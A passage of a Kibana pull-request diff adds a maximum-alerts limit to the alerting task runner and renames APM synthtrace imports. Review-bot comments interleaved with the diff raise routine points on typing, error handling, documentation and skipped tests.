+ }; } return { status: { lastExecutionDate: lastExecutionDate ?? new Date(), status, - ...(hasIncompleteAlertExecution && { - warning: { - reason: RuleExecutionStatusWarningReasons.MAX_EXECUTABLE_ACTIONS, - message: translations.taskRunner.warning.maxExecutableActions, - }, - }), + ...(warning ? { warning } : {}), }, metrics: stateWithMetrics.metrics, }; diff --git a/x-pack/plugins/alerting/server/lib/rule_run_metrics_store.test.ts b/x-pack/plugins/alerting/server/lib/rule_run_metrics_store.test.ts index b27dc37a459e0..f70a36cba0775 100644 --- a/x-pack/plugins/alerting/server/lib/rule_run_metrics_store.test.ts +++ b/x-pack/plugins/alerting/server/lib/rule_run_metrics_store.test.ts 
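Review bot: `let warning = null;` leaves the variable's type to evolving-`let` inference, so the two object literals assigned below are not checked against a declared shape and a typo in `reason` or `message` would only surface, if at all, at the `...(warning ? { warning } : {})` spread. Declaring it as `let warning: { reason: RuleExecutionStatusWarningReasons; message: string } | null = null;` (or the project's warning type, if one is exported) pins the shape at the point both branches assign it and matches the explicit typing used for `status` two lines above. The comment about prioritizing the alert limit over the actions limit is helpful; it might also state that the actions-limit warning is dropped entirely in that case, since the metrics still carry `triggeredActionsStatus` for anyone who needs it.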
@@ -24,6 +24,7 @@ describe('RuleRunMetricsStore', () => { expect(ruleRunMetricsStore.getNumberOfRecoveredAlerts()).toBe(0); expect(ruleRunMetricsStore.getNumberOfNewAlerts()).toBe(0); expect(ruleRunMetricsStore.getStatusByConnectorType('any')).toBe(undefined); + expect(ruleRunMetricsStore.getHasReachedAlertLimit()).toBe(false); }); test('sets and returns numSearches', () => { @@ -77,6 +78,11 @@ describe('RuleRunMetricsStore', () => { expect(ruleRunMetricsStore.getTriggeredActionsStatus()).toBe(ActionsCompletion.PARTIAL); }); + test('sets and returns hasReachedAlertLimit', () => { + ruleRunMetricsStore.setHasReachedAlertLimit(true); + expect(ruleRunMetricsStore.getHasReachedAlertLimit()).toBe(true); + }); + test('gets metrics', () => { expect(ruleRunMetricsStore.getMetrics()).toEqual({ triggeredActionsStatus: 'partial', @@ -88,6 +94,7 @@ describe('RuleRunMetricsStore', () => { numberOfRecoveredAlerts: 11, numberOfTriggeredActions: 5, totalSearchDurationMs: 2, + hasReachedAlertLimit: true, }); }); diff --git a/x-pack/plugins/alerting/server/lib/rule_run_metrics_store.ts b/x-pack/plugins/alerting/server/lib/rule_run_metrics_store.ts index 97fa14214e4f7..edcba1944dc63 100644 --- a/x-pack/plugins/alerting/server/lib/rule_run_metrics_store.ts +++ b/x-pack/plugins/alerting/server/lib/rule_run_metrics_store.ts @@ -18,6 +18,7 @@ interface State { numberOfActiveAlerts: number; numberOfRecoveredAlerts: number; numberOfNewAlerts: number; + hasReachedAlertLimit: boolean; connectorTypes: { [key: string]: { triggeredActionsStatus: ActionsCompletion; @@ -40,6 +41,7 @@ export class RuleRunMetricsStore { numberOfActiveAlerts: 0, numberOfRecoveredAlerts: 0, numberOfNewAlerts: 0, + hasReachedAlertLimit: false, connectorTypes: {}, }; 
@@ -84,6 +86,9 @@ export class RuleRunMetricsStore { triggeredActionsStatus: this.getTriggeredActionsStatus(), }; }; + public getHasReachedAlertLimit = () => { + return this.state.hasReachedAlertLimit; + }; // Setters public setNumSearches = (numSearches: number) => { @@ -119,6 +124,9 @@ export class RuleRunMetricsStore { }) => { set(this.state, `connectorTypes["${actionTypeId}"].triggeredActionsStatus`, status); }; + public setHasReachedAlertLimit = (hasReachedAlertLimit: boolean) => { + this.state.hasReachedAlertLimit = hasReachedAlertLimit; + }; // Checkers public hasReachedTheExecutableActionsLimit = (actionsConfigMap: ActionsConfigMap): boolean => diff --git a/x-pack/plugins/alerting/server/mocks.ts b/x-pack/plugins/alerting/server/mocks.ts index fd554783111d2..7abdf04296beb 100644 --- a/x-pack/plugins/alerting/server/mocks.ts +++ b/x-pack/plugins/alerting/server/mocks.ts @@ -104,6 +104,7 @@ const createRuleExecutorServicesMock = < return { alertFactory: { create: jest.fn().mockReturnValue(alertFactoryMockCreate), + hasReachedAlertLimit: jest.fn().mockReturnValue(false), done: jest.fn().mockReturnValue(alertFactoryMockDone), }, savedObjectsClient: savedObjectsClientMock.create(), diff --git a/x-pack/plugins/alerting/server/plugin.test.ts b/x-pack/plugins/alerting/server/plugin.test.ts index 244a8a56ff9e1..87ed23c66ba3c 100644 --- a/x-pack/plugins/alerting/server/plugin.test.ts +++ b/x-pack/plugins/alerting/server/plugin.test.ts @@ -40,6 +40,9 @@ const generateAlertingConfig = (): AlertingConfig => ({ actions: { max: 1000, }, + alerts: { + max: 1000, + }, }, }, }); diff --git a/x-pack/plugins/alerting/server/plugin.ts b/x-pack/plugins/alerting/server/plugin.ts index 83d9c4f99ded8..7450dcb1a45d0 100644 --- a/x-pack/plugins/alerting/server/plugin.ts +++ b/x-pack/plugins/alerting/server/plugin.ts 
@@ -442,6 +442,7 @@ export class AlertingPlugin { supportsEphemeralTasks: plugins.taskManager.supportsEphemeralTasks(), maxEphemeralActionsPerRule: this.config.maxEphemeralActionsPerAlert, cancelAlertsOnRuleTimeout: this.config.cancelAlertsOnRuleTimeout, + maxAlerts: this.config.rules.run.alerts.max, actionsConfigMap: getActionsConfigMap(this.config.rules.run.actions), usageCounter: this.usageCounter, }); diff --git a/x-pack/plugins/alerting/server/task_runner/task_runner.test.ts b/x-pack/plugins/alerting/server/task_runner/task_runner.test.ts index ea94d7809bfc9..13215b9e2cb20 100644 --- a/x-pack/plugins/alerting/server/task_runner/task_runner.test.ts +++ b/x-pack/plugins/alerting/server/task_runner/task_runner.test.ts @@ -143,6 +143,7 @@ describe('Task Runner', () => { kibanaBaseUrl: 'https://localhost:5601', supportsEphemeralTasks: false, maxEphemeralActionsPerRule: 10, + maxAlerts: 1000, cancelAlertsOnRuleTimeout: true, usageCounter: mockUsageCounter, actionsConfigMap: { @@ -262,7 +263,7 @@ describe('Task Runner', () => { ); expect(logger.debug).nthCalledWith( 3, - 'ruleRunMetrics for test:1: {"numSearches":3,"totalSearchDurationMs":23423,"esSearchDurationMs":33,"numberOfTriggeredActions":0,"numberOfGeneratedActions":0,"numberOfActiveAlerts":0,"numberOfRecoveredAlerts":0,"numberOfNewAlerts":0,"triggeredActionsStatus":"complete"}' + 'ruleRunMetrics for test:1: {"numSearches":3,"totalSearchDurationMs":23423,"esSearchDurationMs":33,"numberOfTriggeredActions":0,"numberOfGeneratedActions":0,"numberOfActiveAlerts":0,"numberOfRecoveredAlerts":0,"numberOfNewAlerts":0,"hasReachedAlertLimit":false,"triggeredActionsStatus":"complete"}' ); testAlertingEventLogCalls({ status: 'ok' }); 
@@ -343,7 +344,7 @@ describe('Task Runner', () => { ); expect(logger.debug).nthCalledWith( 4, - 'ruleRunMetrics for test:1: {"numSearches":3,"totalSearchDurationMs":23423,"esSearchDurationMs":33,"numberOfTriggeredActions":1,"numberOfGeneratedActions":1,"numberOfActiveAlerts":1,"numberOfRecoveredAlerts":0,"numberOfNewAlerts":1,"triggeredActionsStatus":"complete"}' + 'ruleRunMetrics for test:1: {"numSearches":3,"totalSearchDurationMs":23423,"esSearchDurationMs":33,"numberOfTriggeredActions":1,"numberOfGeneratedActions":1,"numberOfActiveAlerts":1,"numberOfRecoveredAlerts":0,"numberOfNewAlerts":1,"hasReachedAlertLimit":false,"triggeredActionsStatus":"complete"}' ); testAlertingEventLogCalls({ @@ -430,7 +431,7 @@ describe('Task Runner', () => { ); expect(logger.debug).nthCalledWith( 5, - 'ruleRunMetrics for test:1: {"numSearches":3,"totalSearchDurationMs":23423,"esSearchDurationMs":33,"numberOfTriggeredActions":0,"numberOfGeneratedActions":0,"numberOfActiveAlerts":1,"numberOfRecoveredAlerts":0,"numberOfNewAlerts":1,"triggeredActionsStatus":"complete"}' + 'ruleRunMetrics for test:1: {"numSearches":3,"totalSearchDurationMs":23423,"esSearchDurationMs":33,"numberOfTriggeredActions":0,"numberOfGeneratedActions":0,"numberOfActiveAlerts":1,"numberOfRecoveredAlerts":0,"numberOfNewAlerts":1,"hasReachedAlertLimit":false,"triggeredActionsStatus":"complete"}' ); testAlertingEventLogCalls({ 
@@ -604,7 +605,7 @@ describe('Task Runner', () => { ); expect(logger.debug).nthCalledWith( 5, - 'ruleRunMetrics for test:1: {"numSearches":3,"totalSearchDurationMs":23423,"esSearchDurationMs":33,"numberOfTriggeredActions":1,"numberOfGeneratedActions":1,"numberOfActiveAlerts":2,"numberOfRecoveredAlerts":0,"numberOfNewAlerts":2,"triggeredActionsStatus":"complete"}' + 'ruleRunMetrics for test:1: {"numSearches":3,"totalSearchDurationMs":23423,"esSearchDurationMs":33,"numberOfTriggeredActions":1,"numberOfGeneratedActions":1,"numberOfActiveAlerts":2,"numberOfRecoveredAlerts":0,"numberOfNewAlerts":2,"hasReachedAlertLimit":false,"triggeredActionsStatus":"complete"}' ); expect(mockUsageCounter.incrementCounter).not.toHaveBeenCalled(); } @@ -1119,7 +1120,7 @@ describe('Task Runner', () => { ); expect(logger.debug).nthCalledWith( 5, - 'ruleRunMetrics for test:1: {"numSearches":3,"totalSearchDurationMs":23423,"esSearchDurationMs":33,"numberOfTriggeredActions":2,"numberOfGeneratedActions":2,"numberOfActiveAlerts":1,"numberOfRecoveredAlerts":1,"numberOfNewAlerts":0,"triggeredActionsStatus":"complete"}' + 'ruleRunMetrics for test:1: {"numSearches":3,"totalSearchDurationMs":23423,"esSearchDurationMs":33,"numberOfTriggeredActions":2,"numberOfGeneratedActions":2,"numberOfActiveAlerts":1,"numberOfRecoveredAlerts":1,"numberOfNewAlerts":0,"hasReachedAlertLimit":false,"triggeredActionsStatus":"complete"}' ); testAlertingEventLogCalls({ 
@@ -1232,7 +1233,7 @@ describe('Task Runner', () => { ); expect(logger.debug).nthCalledWith( 5, - `ruleRunMetrics for test:1: {"numSearches":3,"totalSearchDurationMs":23423,"esSearchDurationMs":33,"numberOfTriggeredActions":2,"numberOfGeneratedActions":2,"numberOfActiveAlerts":1,"numberOfRecoveredAlerts":1,"numberOfNewAlerts":0,"triggeredActionsStatus":"complete"}` + `ruleRunMetrics for test:1: {"numSearches":3,"totalSearchDurationMs":23423,"esSearchDurationMs":33,"numberOfTriggeredActions":2,"numberOfGeneratedActions":2,"numberOfActiveAlerts":1,"numberOfRecoveredAlerts":1,"numberOfNewAlerts":0,"hasReachedAlertLimit":false,"triggeredActionsStatus":"complete"}` ); testAlertingEventLogCalls({ @@ -2362,7 +2363,7 @@ describe('Task Runner', () => { ); expect(logger.debug).nthCalledWith( 3, - 'ruleRunMetrics for test:1: {"numSearches":3,"totalSearchDurationMs":23423,"esSearchDurationMs":33,"numberOfTriggeredActions":0,"numberOfGeneratedActions":0,"numberOfActiveAlerts":0,"numberOfRecoveredAlerts":0,"numberOfNewAlerts":0,"triggeredActionsStatus":"complete"}' + 'ruleRunMetrics for test:1: {"numSearches":3,"totalSearchDurationMs":23423,"esSearchDurationMs":33,"numberOfTriggeredActions":0,"numberOfGeneratedActions":0,"numberOfActiveAlerts":0,"numberOfRecoveredAlerts":0,"numberOfNewAlerts":0,"hasReachedAlertLimit":false,"triggeredActionsStatus":"complete"}' ); testAlertingEventLogCalls({ @@ -2859,6 +2860,7 @@ describe('Task Runner', () => { setRuleName = true, logAlert = 0, logAction = 0, + hasReachedAlertLimit = false, }: { status: string; ruleContext?: RuleContextOpts; @@ -2873,6 +2875,7 @@ describe('Task Runner', () => { logAction?: number; errorReason?: string; errorMessage?: string; + hasReachedAlertLimit?: boolean; }) { expect(alertingEventLogger.initialize).toHaveBeenCalledWith(ruleContext); expect(alertingEventLogger.start).toHaveBeenCalled(); 
@@ -2905,6 +2908,7 @@ describe('Task Runner', () => { numberOfRecoveredAlerts: recoveredAlerts, numberOfTriggeredActions: triggeredActions, totalSearchDurationMs: 23423, + hasReachedAlertLimit, triggeredActionsStatus: 'partial', }, status: { @@ -2927,6 +2931,7 @@ describe('Task Runner', () => { numberOfRecoveredAlerts: recoveredAlerts, numberOfTriggeredActions: triggeredActions, totalSearchDurationMs: 23423, + hasReachedAlertLimit, triggeredActionsStatus: 'complete', }, status: { diff --git a/x-pack/plugins/alerting/server/task_runner/task_runner.ts b/x-pack/plugins/alerting/server/task_runner/task_runner.ts index 16d2dac684e47..d5aaacbacc16a 100644 --- a/x-pack/plugins/alerting/server/task_runner/task_runner.ts +++ b/x-pack/plugins/alerting/server/task_runner/task_runner.ts @@ -108,6 +108,7 @@ export class TaskRunner< private readonly executionId: string; private readonly ruleTypeRegistry: RuleTypeRegistry; private readonly inMemoryMetrics: InMemoryMetrics; + private readonly maxAlerts: number; private alertingEventLogger: AlertingEventLogger; private usageCounter?: UsageCounter; private searchAbortController: AbortController; @@ -138,6 +139,7 @@ export class TaskRunner< this.cancelled = false; this.executionId = uuid.v4(); this.inMemoryMetrics = inMemoryMetrics; + this.maxAlerts = context.maxAlerts; this.alertingEventLogger = new AlertingEventLogger(this.context.eventLogger); } 
@@ -228,22 +230,26 @@ export class TaskRunner<
 executionHandler: ExecutionHandler,
 ruleRunMetricsStore: RuleRunMetricsStore
 ) {
- const {
- actionGroup,
- subgroup: actionSubgroup,
- context,
- state,
- } = alert.getScheduledActionOptions()!;
- alert.updateLastScheduledActions(actionGroup, actionSubgroup);
- alert.unscheduleActions();
- return executionHandler({
- actionGroup,
- actionSubgroup,
- context,
- state,
- alertId,
- ruleRunMetricsStore,
- });
+ if (alert.hasScheduledActions()) {
+ const {
+ actionGroup,
+ subgroup: actionSubgroup,
+ context,
+ state,
+ } = alert.getScheduledActionOptions()!;
+ alert.updateLastScheduledActions(actionGroup, actionSubgroup);
+ alert.unscheduleActions();
+ return executionHandler({
+ actionGroup,
+ actionSubgroup,
+ context,
+ state,
+ alertId,
+ ruleRunMetricsStore,
+ });
+ }
+
+ return Promise.resolve();
 }
 
 private async executeRule(
@@ -279,6 +285,8 @@ export class TaskRunner<
 },
 } = this.taskInstance;
 
+ const ruleRunMetricsStore = new RuleRunMetricsStore();
+
 const executionHandler = this.getExecutionHandler(
 ruleId,
 rule.name,
@@ -325,6 +333,16 @@ export class TaskRunner<
 searchSourceClient,
 });
 
+ const alertFactory = createAlertFactory<
+ State,
+ Context,
+ WithoutReservedActionGroups
+ >({
+ alerts,
+ logger: this.logger,
+ maxAlerts: this.maxAlerts,
+ canSetRecoveryContext: ruleType.doesSetRecoveryContext ?? false,
+ });
 let updatedRuleTypeState: void | Record;
 try {
 const ctx = {
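Review bot: The new `if (alert.hasScheduledActions()) { … }` wrapper in executeAlert nests the entire former body one level deeper only to append a fallback `return Promise.resolve();`; a guard clause keeps the body flat and puts the non-null assertion on `getScheduledActionOptions()!` right next to the check that justifies it. Replace the wrapper with `if (!alert.hasScheduledActions()) { return Promise.resolve(); }` at the top of the method and leave the original destructure-and-dispatch body as it was. The signature of executeAlert begins before this hunk, so the declared return type that now has to cover both branches is not visible here. The second and third hunks on this line move ruleRunMetricsStore and createAlertFactory ahead of the try block, which is what makes both reachable from the catch in the next hunk.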
@@ -349,15 +367,7 @@ export class TaskRunner<
 searchSourceClient: wrappedSearchSourceClient.searchSourceClient,
 uiSettingsClient: this.context.uiSettings.asScopedToClient(savedObjectsClient),
 scopedClusterClient: wrappedScopedClusterClient.client(),
- alertFactory: createAlertFactory<
- State,
- Context,
- WithoutReservedActionGroups
- >({
- alerts,
- logger: this.logger,
- canSetRecoveryContext: ruleType.doesSetRecoveryContext ?? false,
- }),
+ alertFactory,
 shouldWriteAlerts: () => this.shouldLogAndScheduleActionsForAlerts(),
 shouldStopExecution: () => this.cancelled,
 },
@@ -391,15 +401,23 @@ export class TaskRunner<
 })
 );
 } catch (err) {
- this.alertingEventLogger.setExecutionFailed(
- `rule execution failure: ${ruleLabel}`,
- err.message
- );
- this.logger.error(err, {
- tags: [this.ruleType.id, ruleId, 'rule-run-failed'],
- error: { stack_trace: err.stack },
- });
- throw new ErrorWithReason(RuleExecutionStatusErrorReasons.Execute, err);
+ // Check if this error is due to reaching the alert limit
+ if (alertFactory.hasReachedAlertLimit()) {
+ this.logger.warn(
+ `rule execution generated greater than ${this.maxAlerts} alerts: ${ruleLabel}`
+ );
+ ruleRunMetricsStore.setHasReachedAlertLimit(true);
+ } else {
+ this.alertingEventLogger.setExecutionFailed(
+ `rule execution failure: ${ruleLabel}`,
+ err.message
+ );
+ this.logger.error(err, {
+ tags: [this.ruleType.id, ruleId, 'rule-run-failed'],
+ error: { stack_trace: err.stack },
+ });
+ throw new ErrorWithReason(RuleExecutionStatusErrorReasons.Execute, err);
+ }
 }
 
 this.alertingEventLogger.setExecutionSucceeded(`rule executed: ${ruleLabel}`);
@@ -415,7 +433,6 @@ export class TaskRunner<
 scopedClusterClientMetrics.esSearchDurationMs +
 searchSourceClientMetrics.esSearchDurationMs,
 };
- const ruleRunMetricsStore = new RuleRunMetricsStore();
 ruleRunMetricsStore.setNumSearches(searchMetrics.numSearches);
 ruleRunMetricsStore.setTotalSearchDurationMs(searchMetrics.totalSearchDurationMs);
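Review bot: In the new catch branch, `alertFactory.hasReachedAlertLimit()` inspects factory state rather than `err`, so any unrelated exception the executor throws after the limit was hit is discarded here: nothing about it is logged, `setExecutionSucceeded` runs on the line after the catch, and `updatedRuleTypeState` stays unset while the run is recorded as a completed limit-reached execution. At minimum carry the original error into the warning so a swallowed failure is visible in the logs, e.g. `` `rule execution generated greater than ${this.maxAlerts} alerts: ${ruleLabel} (${err.message})` ``, and consider matching on the specific limit error if the factory exposes one. The comment `// Check if this error is due to reaching the alert limit` overstates what the condition does; `// The factory reports the limit was hit during this run; the error is assumed to be the limit error and the run is treated as a partial success` matches the code. The enclosing executeRule method starts and ends outside this hunk.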
@@ -426,7 +443,12 @@ export class TaskRunner<
 Context,
 ActionGroupIds,
 RecoveryActionGroupId
- >(alerts, originalAlerts);
+ >({
+ alerts,
+ existingAlerts: originalAlerts,
+ hasReachedAlertLimit: alertFactory.hasReachedAlertLimit(),
+ alertLimit: this.maxAlerts,
+ });
 
 logAlerts({
 logger: this.logger,
diff --git a/x-pack/plugins/alerting/server/task_runner/task_runner_cancel.test.ts b/x-pack/plugins/alerting/server/task_runner/task_runner_cancel.test.ts
index fb2d1be3a3872..088ef6f9a1be4 100644
--- a/x-pack/plugins/alerting/server/task_runner/task_runner_cancel.test.ts
+++ b/x-pack/plugins/alerting/server/task_runner/task_runner_cancel.test.ts
@@ -120,6 +120,7 @@ describe('Task Runner Cancel', () => {
 kibanaBaseUrl: 'https://localhost:5601',
 supportsEphemeralTasks: false,
 maxEphemeralActionsPerRule: 10,
+ maxAlerts: 1000,
 cancelAlertsOnRuleTimeout: true,
 usageCounter: mockUsageCounter,
 actionsConfigMap: {
@@ -414,7 +415,7 @@ describe('Task Runner Cancel', () => {
 );
 expect(logger.debug).nthCalledWith(
 7,
- 'ruleRunMetrics for test:1: {"numSearches":3,"totalSearchDurationMs":23423,"esSearchDurationMs":33,"numberOfTriggeredActions":1,"numberOfGeneratedActions":1,"numberOfActiveAlerts":1,"numberOfRecoveredAlerts":0,"numberOfNewAlerts":1,"triggeredActionsStatus":"complete"}'
+ 'ruleRunMetrics for test:1: {"numSearches":3,"totalSearchDurationMs":23423,"esSearchDurationMs":33,"numberOfTriggeredActions":1,"numberOfGeneratedActions":1,"numberOfActiveAlerts":1,"numberOfRecoveredAlerts":0,"numberOfNewAlerts":1,"hasReachedAlertLimit":false,"triggeredActionsStatus":"complete"}'
 );
 }
 
@@ -428,6 +429,7 @@ describe('Task Runner Cancel', () => {
 status,
 logAlert = 0,
 logAction = 0,
+ hasReachedAlertLimit = false,
 }: {
 status: string;
 ruleContext?: RuleContextOpts;
@@ -439,6 +441,7 @@ describe('Task Runner Cancel', () => {
 setRuleName?: boolean;
 logAlert?: number;
 logAction?: number;
+ hasReachedAlertLimit?: boolean;
 }) {
 expect(alertingEventLogger.initialize).toHaveBeenCalledWith(ruleContext);
 expect(alertingEventLogger.start).toHaveBeenCalled();
@@ -455,6 +458,7 @@ describe('Task Runner Cancel', () => {
 numberOfRecoveredAlerts: recoveredAlerts,
 numberOfTriggeredActions: triggeredActions,
 totalSearchDurationMs: 23423,
+ hasReachedAlertLimit,
 triggeredActionsStatus: 'complete',
 },
 status: {
diff --git a/x-pack/plugins/alerting/server/task_runner/task_runner_factory.test.ts b/x-pack/plugins/alerting/server/task_runner/task_runner_factory.test.ts
index e787617800356..9ecc361ca4af4 100644
--- a/x-pack/plugins/alerting/server/task_runner/task_runner_factory.test.ts
+++ b/x-pack/plugins/alerting/server/task_runner/task_runner_factory.test.ts
@@ -98,6 +98,7 @@ describe('Task Runner Factory', () => {
 kibanaBaseUrl: 'https://localhost:5601',
 supportsEphemeralTasks: true,
 maxEphemeralActionsPerRule: 10,
+ maxAlerts: 1000,
 cancelAlertsOnRuleTimeout: true,
 executionContext,
 usageCounter: mockUsageCounter,
diff --git a/x-pack/plugins/alerting/server/task_runner/task_runner_factory.ts b/x-pack/plugins/alerting/server/task_runner/task_runner_factory.ts
index 09fe8cb030c40..a5ca6973cda27 100644
--- a/x-pack/plugins/alerting/server/task_runner/task_runner_factory.ts
+++ b/x-pack/plugins/alerting/server/task_runner/task_runner_factory.ts
@@ -53,6 +53,7 @@ export interface TaskRunnerContext {
 kibanaBaseUrl: string | undefined;
 supportsEphemeralTasks: boolean;
 maxEphemeralActionsPerRule: number;
+ maxAlerts: number;
 actionsConfigMap: ActionsConfigMap;
 cancelAlertsOnRuleTimeout: boolean;
 usageCounter?: UsageCounter;
diff --git a/x-pack/plugins/alerting/server/types.ts b/x-pack/plugins/alerting/server/types.ts
index 870eeffe6553d..efce3583e1879 100644
--- a/x-pack/plugins/alerting/server/types.ts
+++ b/x-pack/plugins/alerting/server/types.ts
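Review bot: `maxAlerts: number;` is added to the exported `TaskRunnerContext` interface in the task_runner_factory.ts hunk without a TSDoc comment, and the same applies to `hasReachedAlertLimit: () => boolean;` on the public `alertFactory` services in the types.ts hunk on the next line (L1312) — that one is the surface rule type authors program against, so it is the more important of the two. For the context field, `/** Alert limit handed to createAlertFactory for every rule run. */` states what the task runner visibly does with it; for the service, `/** True once this run's alert factory has hit the configured alert limit; the task runner then treats an executor error as a limit-reached run rather than a failure. */` tells an executor author why the value matters. Both interfaces start before their hunks, so any existing doc style on neighbouring members is not visible here.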
@@ -80,6 +80,7 @@ export interface RuleExecutorServices< scopedClusterClient: IScopedClusterClient; alertFactory: { create: (id: string) => PublicAlert; + hasReachedAlertLimit: () => boolean; done: () => AlertFactoryDoneUtils; }; shouldWriteAlerts: () => boolean; diff --git a/x-pack/plugins/apm/dev_docs/local_setup.md b/x-pack/plugins/apm/dev_docs/local_setup.md index 24a8db44a3cce..9f3553f3c680c 100644 --- a/x-pack/plugins/apm/dev_docs/local_setup.md +++ b/x-pack/plugins/apm/dev_docs/local_setup.md @@ -44,7 +44,7 @@ elasticsearch.username: kibana_system elasticsearch.password: changeme ``` -Documentation for [Synthtrace](https://github.com/elastic/kibana/blob/main/packages/elastic-apm-synthtrace/README.md) +Documentation for [Synthtrace](https://github.com/elastic/kibana/blob/main/packages/kbn-apm-synthtrace/README.md) ## 2. Cloud-based ES Cluster (internal devs only) diff --git a/x-pack/plugins/apm/dev_docs/testing.md b/x-pack/plugins/apm/dev_docs/testing.md index b3eabc27a515b..c204a3922139f 100644 --- a/x-pack/plugins/apm/dev_docs/testing.md +++ b/x-pack/plugins/apm/dev_docs/testing.md @@ -63,7 +63,7 @@ node scripts/test/api --runner --basic --updateSnapshots **API Test tips** -- For data generation in API tests have a look at the [elastic-apm-synthtrace](../../../../packages/elastic-apm-synthtrace/README.md) package +- For data generation in API tests have a look at the [kbn-apm-synthtrace](../../../../packages/kbn-apm-synthtrace/README.md) package - For debugging access Elasticsearch on http://localhost:9220 and Kibana on http://localhost:5620 (`elastic` / `changeme`) --- 
@@ -124,4 +124,4 @@ All files with a .stories.tsx extension will be loaded. You can access the devel For end-to-end (e.g. agent -> apm server -> elasticsearch <- kibana) development and testing of Elastic APM please check the the [APM Integration Testing repository](https://github.com/elastic/apm-integration-testing). -Data can also be generated using the [elastic-apm-synthtrace](../../../../packages/elastic-apm-synthtrace/README.md) CLI. +Data can also be generated using the [kbn-apm-synthtrace](../../../../packages/kbn-apm-synthtrace/README.md) CLI. diff --git a/x-pack/plugins/apm/ftr_e2e/cypress/fixtures/synthtrace/opbeans.ts b/x-pack/plugins/apm/ftr_e2e/cypress/fixtures/synthtrace/opbeans.ts index 1d0155bf9b434..1be9873d25c4f 100644 --- a/x-pack/plugins/apm/ftr_e2e/cypress/fixtures/synthtrace/opbeans.ts +++ b/x-pack/plugins/apm/ftr_e2e/cypress/fixtures/synthtrace/opbeans.ts @@ -4,7 +4,7 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ -import { apm, timerange } from '@elastic/apm-synthtrace'; +import { apm, timerange } from '@kbn/apm-synthtrace'; export function opbeans({ from, to }: { from: number; to: number }) { const range = timerange(from, to); diff --git a/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/feature_flag/comparison.spec.ts b/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/feature_flag/comparison.spec.ts index d3ac4cc0e095f..1a58eb1ca4fda 100644 --- a/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/feature_flag/comparison.spec.ts +++ b/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/feature_flag/comparison.spec.ts @@ -10,7 +10,7 @@ import { opbeans } from '../../../fixtures/synthtrace/opbeans'; const start = '2021-10-10T00:00:00.000Z'; const end = '2021-10-10T00:15:00.000Z'; -describe('Comparison feature flag', () => { +describe.skip('Comparison feature flag', () => { before(async () => { await synthtrace.index( opbeans({ 
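Review bot: `describe.skip('Comparison feature flag', …)` disables the whole suite without recording why or when it should come back, and the same applies to `describe.skip('Infrastructure page', …)` in the infrastructure_page.spec.ts hunk three lines down (L1316). A skipped suite with no reason attached tends to stay skipped indefinitely; add a one-line comment above each `describe.skip`, e.g. `// Skipped: <reason> — re-enable under <ISSUE-ID placeholder>`. The companion infrastructure.spec.ts is deleted outright in the next hunk, so it is also worth stating whether the remaining skipped suites are meant to be deleted or restored.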
diff --git a/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/feature_flag/infrastructure.spec.ts b/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/feature_flag/infrastructure.spec.ts deleted file mode 100644 index 99178c810067e..0000000000000 --- a/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/feature_flag/infrastructure.spec.ts +++ /dev/null 
@@ -1,61 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -import { synthtrace } from '../../../../synthtrace'; -import { opbeans } from '../../../fixtures/synthtrace/opbeans'; - -const serviceOverviewPath = '/app/apm/services/opbeans-python/overview'; - -const start = '2021-10-10T00:00:00.000Z'; -const end = '2021-10-10T00:15:00.000Z'; - -describe('Infrastracture feature flag', () => { - before(async () => { - await synthtrace.index( - opbeans({ - from: new Date(start).getTime(), - to: new Date(end).getTime(), - }) - ); - }); - - after(async () => { - await synthtrace.clean(); - }); - - describe('when infrastracture feature is enabled', () => { - beforeEach(() => { - cy.loginAsEditorUser().then(() => { - // enables infrastructure view feature on advanced settings - cy.updateAdvancedSettings({ - 'observability:enableInfrastructureView': true, - }); - }); - }); - - it('shows infrastructure tab in service overview page', () => { - cy.visit(serviceOverviewPath); - cy.contains('a[role="tab"]', 'Infrastructure'); - }); - }); - - describe('when infrastracture feature is disabled', () => { - beforeEach(() => { - cy.loginAsEditorUser().then(() => { - // enables infrastructure view feature on advanced settings - cy.updateAdvancedSettings({ - 'observability:enableInfrastructureView': false, - }); - }); - }); - - it('hides infrastructure tab in service overview page', () => { - cy.visit(serviceOverviewPath); - cy.contains('a[role="tab"]', 'Infrastructure').should('not.exist'); - }); - }); -}); diff --git a/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/infrastructure/generate_data.ts b/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/infrastructure/generate_data.ts index 1399875791417..52cf6b988f1a1 100644 
--- a/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/infrastructure/generate_data.ts +++ b/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/infrastructure/generate_data.ts @@ -4,7 +4,7 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ -import { apm, timerange } from '@elastic/apm-synthtrace'; +import { apm, timerange } from '@kbn/apm-synthtrace'; export function generateData({ from, to }: { from: number; to: number }) { const range = timerange(from, to); diff --git a/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/infrastructure/infrastructure_page.spec.ts b/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/infrastructure/infrastructure_page.spec.ts index 65f76f7cfd95c..46d654ef2a4aa 100644 --- a/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/infrastructure/infrastructure_page.spec.ts +++ b/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/infrastructure/infrastructure_page.spec.ts @@ -27,7 +27,7 @@ const nodeServiceInfraPageHref = url.format({ query: { rangeFrom: start, rangeTo: end }, }); -describe('Infrastructure page', () => { +describe.skip('Infrastructure page', () => { before(async () => { await synthtrace.index( generateData({ diff --git a/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/settings/agent_configurations.spec.ts b/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/settings/agent_configurations.spec.ts index 4661ea67ae2ab..a2f5e055e80a8 100644 --- a/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/settings/agent_configurations.spec.ts +++ 